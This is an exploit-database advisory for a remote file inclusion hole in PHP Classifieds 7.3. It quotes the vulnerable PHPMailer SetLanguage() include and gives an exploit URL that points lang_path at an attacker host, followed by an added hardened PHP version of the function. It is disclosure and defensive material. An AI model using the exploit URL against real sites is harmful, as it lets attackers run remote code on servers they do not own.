PHP Classifieds 7.3 - Remote File Inclusion

Author: alsa7r
type: webapps
platform: php
port: 
date_added: 2010-09-04 
date_updated: 2010-09-04 
verified: 0 
codes: CVE-2010-4914;OSVDB-76202 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpclassifieds7_3.zip

==================================
  PHP Classifieds v7.3 RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability
[x] DatE          : 09 September 2010
[x] AutH0r        : alsa7r
[x] Contact       : TBT9@hotmail.com
[x] TestEd 0n     : windows 7
[x] d0rK          : :P
====================================================

==========================================================================================
[x]bug heRe:
 function SetLanguage($lang_type, $lang_path = "tools/phpmailer/language/") {
     //echo $lang_path.'phpmailer.lang-'.$lang_type.'.php';
     // Both include() paths are built from $lang_path and $lang_type without validation.
     if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php'))
         include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
     else if(file_exists($lang_path.'phpmailer.lang-en.php'))
         include($lang_path.'phpmailer.lang-en.php');
     // the final else branch is cut off in the advisory
 }
==========================================================================================

==================================================================
[x]expL0iT:
http://[site]/classifieds/tools/phpmailer/class.phpmailer.php?lang_path=[EV!L]
==================================================================
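
A hardened counterpart to the SetLanguage() include quoted above, as an added example that is not code from PHP Classifieds, PHPMailer or the advisory author: the directory comes from server-side configuration and the language code is allow-listed before any path is built. The function name loadMailerLanguage, the temporary demo directory and the $PHPMAILER_LANG array convention are assumptions.

```php
<?php
// Added example, not PHP Classifieds or PHPMailer code.
// $langDir must come from application configuration, never from the request.
function loadMailerLanguage(string $langDir, string $langType): array
{
    $base = realpath($langDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('language directory missing');
    }
    // Allow-list the language code: "en", "fr", "pt_br", nothing else.
    if (!preg_match('/\A[a-z]{2}(_[a-z]{2})?\z/', $langType)) {
        $langType = 'en';
    }
    foreach (array_unique([$langType, 'en']) as $code) {
        // realpath() is false for missing files and for URLs, and resolves ".." and symlinks.
        $file = realpath($base . DIRECTORY_SEPARATOR . "phpmailer.lang-$code.php");
        // Only include a file that sits directly inside the configured directory.
        if ($file !== false && dirname($file) === $base) {
            $PHPMAILER_LANG = [];   // assumption: language files fill this array
            include $file;
            return $PHPMAILER_LANG;
        }
    }
    throw new RuntimeException('no language file found');
}

// Constructed demo: a temporary language directory holding one English file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/phpmailer.lang-en.php",
    '<?php $PHPMAILER_LANG["connect_host"] = "SMTP Error: could not connect";');

// Constructed inputs: malformed language codes all fall back to the English file.
foreach (['en', '../other', 'http://example.invalid/x', "en\0"] as $input) {
    $lang = loadMailerLanguage($dir, $input);
    printf("%-30s -> %d string(s) loaded\n",
        json_encode($input, JSON_UNESCAPED_SLASHES), count($lang));
}

unlink("$dir/phpmailer.lang-en.php");
rmdir($dir);
```

Setting `allow_url_include = Off` in php.ini additionally stops include() from fetching URLs, independent of the application code.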

============================================================================================
[x]th4nKs t0:
Mr.wolf , morabko , unit x team , sudan hacker team
============================================================================================

=====================
TBT9[at]hotmail[dot]com
=====================